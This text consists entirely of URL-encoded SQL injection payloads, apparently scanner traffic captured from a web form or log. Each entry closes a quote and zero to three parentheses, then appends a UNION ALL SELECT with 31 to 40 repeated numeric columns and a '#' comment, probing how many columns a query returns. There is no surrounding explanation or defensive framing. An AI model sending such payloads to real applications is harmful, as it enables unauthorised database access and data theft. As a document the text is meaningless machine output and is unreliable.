-6170%22%29%20UNION%20ALL%20SELECT%209442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%2C9442%23 -7156%22%29%20UNION%20ALL%20SELECT%206904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%2C6904%23 -8892%22%29%20UNION%20ALL%20SELECT%203391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%2C3391%23 -4930%22%29%20UNION%20ALL%20SELECT%204625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%2C4625%23 -5462%22%29%20UNION%20ALL%20SELECT%208790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%2C8790%23 -2017%22%29%20UNION%20ALL%20SELECT%201678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%23 -6501%22%29%20UNION%20ALL%20SELECT%208597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%2C8597%23 -5521%22%29%20UNION%20ALL%20SELECT%202483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%2C2483%23 -1051%22%29%29%20UNION%20ALL%20SELECT%207982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%2C7982%23 -2697%22%29%29%20UNION%20ALL%20SELECT%208691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%2C8691%23 -1819%22%29%29%20UNION%20ALL%20SELECT%204159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%23 -7319%22%29%29%20UNION%20ALL%20SELECT%204197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%2C4197%23 -5734%22%29%29%20UNION%20ALL%20SELECT%206234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%2C6234%23 -2480%22%29%29%20UNION%20ALL%20SELECT%205683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%2C5683%23 -7291%22%29%29%20UNION%20ALL%20SELECT%206822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%23 -1679%22%29%29%20UNION%20ALL%20SELECT%206518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%2C6518%23 -4726%22%29%29%20UNION%20ALL%20SELECT%209528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%2C9528%23 -8807%22%29%29%20UNION%20ALL%20SELECT%209151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%23 -4972%22%29%29%29%20UNION%20ALL%20SELECT%206873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%2C6873%23 -3841%22%29%29%29%20UNION%20ALL%20SELECT%206480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%2C6480%23 -7035%22%29%29%29%20UNION%20ALL%20SELECT%203805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%2C3805%23 -9012%22%29%29%29%20UNION%20ALL%20SELECT%206144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%23 -3698%22%29%29%29%20UNION%20ALL%20SELECT%204223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%23 -9130%22%29%29%29%20UNION%20ALL%20SELECT%204956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%23 -2660%22%29%29%29%20UNION%20ALL%20SELECT%203046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%2C3046%23 -3474%22%29%29%29%20UNION%20ALL%20SELECT%202729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%2C2729%23 -5489%22%29%29%29%20UNION%20ALL%20SELECT%206405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%23 -2129%22%29%29%29%20UNION%20ALL%20SELECT%209586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%2C9586%23 -8739%22%20UNION%20ALL%20SELECT%207042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%2C7042%23 -1525%22%20UNION%20ALL%20SELECT%202642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%2C2642%23 -1180%22%20UNION%20ALL%20SELECT%205170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%23 -6277%22%20UNION%20ALL%20SELECT%203148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%2C3148%23 -8192%22%20UNION%20ALL%20SELECT%209789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%2C9789%23 -1695%22%20UNION%20ALL%20SELECT%208688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%23 -2666%22%20UNION%20ALL%20SELECT%207357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%2C7357%23 -2406%22%20UNION%20ALL%20SELECT%205345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%23 -8117%22%20UNION%20ALL%20SELECT%207750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%2C7750%23 -4756%22%20UNION%20ALL%20SELECT%206057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%2C6057%23 -1879%22%29%20UNION%20ALL%20SELECT%204048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%2C4048%23 -2727%22%29%20UNION%20ALL%20SELECT%201217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%23 -9161%22%29%20UNION%20ALL%20SELECT%207214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%2C7214%23 -2023%22%29%20UNION%20ALL%20SELECT%202578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%23 -4198%22%29%20UNION%20ALL%20SELECT%203349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%2C3349%23 -4640%22%29%20UNION%20ALL%20SELECT%209753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%2C9753%23 -9254%22%29%20UNION%20ALL%20SELECT%202632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%2C2632%23 -1513%22%29%20UNION%20ALL%20SELECT%208852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%2C8852%23 -8393%22%29%20UNION%20ALL%20SELECT%209404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%23 -4148%22%29%20UNION%20ALL%20SELECT%207909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%23 -8097%22%29%29%20UNION%20ALL%20SELECT%208702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%2C8702%23 -4185%22%29%29%20UNION%20ALL%20SELECT%205897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%2C5897%23 -3878%22%29%29%20UNION%20ALL%20SELECT%208324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%2C8324%23 -7488%22%29%29%20UNION%20ALL%20SELECT%207283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%2C7283%23 -8928%22%29%29%20UNION%20ALL%20SELECT%203021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%23 -5356%22%29%29%20UNION%20ALL%20SELECT%202280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%2C2280%23 -3343%22%29%29%20UNION%20ALL%20SELECT%208883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%2C8883%23 -9554%22%29%29%20UNION%20ALL%20SELECT%204979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%2C4979%23 -8129%22%29%29%20UNION%20ALL%20SELECT%207729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%2C7729%23 -8180%22%29%29%20UNION%20ALL%20SELECT%202820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%2C2820%23 -2050%22%29%29%29%20UNION%20ALL%20SELECT%208175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%23 -5615%22%29%29%29%20UNION%20ALL%20SELECT%202355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%2C2355%23 -7711%22%29%29%29%20UNION%20ALL%20SELECT%204997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%2C4997%23 -6783%22%29%29%29%20UNION%20ALL%20SELECT%205363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%2C5363%23 -3559%22%29%29%29%20UNION%20ALL%20SELECT%205182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%23 -1844%22%29%29%29%20UNION%20ALL%20SELECT%207038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%2C7038%23 -8769%22%29%29%29%20UNION%20ALL%20SELECT%201385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%2C1385%23 -7671%22%29%29%29%20UNION%20ALL%20SELECT%201726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%23 -3803%22%29%29%29%20UNION%20ALL%20SELECT%202828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%2C2828%23 -8301%22%29%29%29%20UNION%20ALL%20SELECT%202367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%23 -3909%22%20UNION%20ALL%20SELECT%206363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%23 -5083%22%20UNION%20ALL%20SELECT%203211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%2C3211%23 -3016%22%20UNION%20ALL%20SELECT%205961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%23 -3120%22%20UNION%20ALL%20SELECT%204522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%2C4522%23 -9316%22%20UNION%20ALL%20SELECT%203331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%2C3331%23 -9793%22%20UNION%20ALL%20SELECT%204407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%2C4407%23 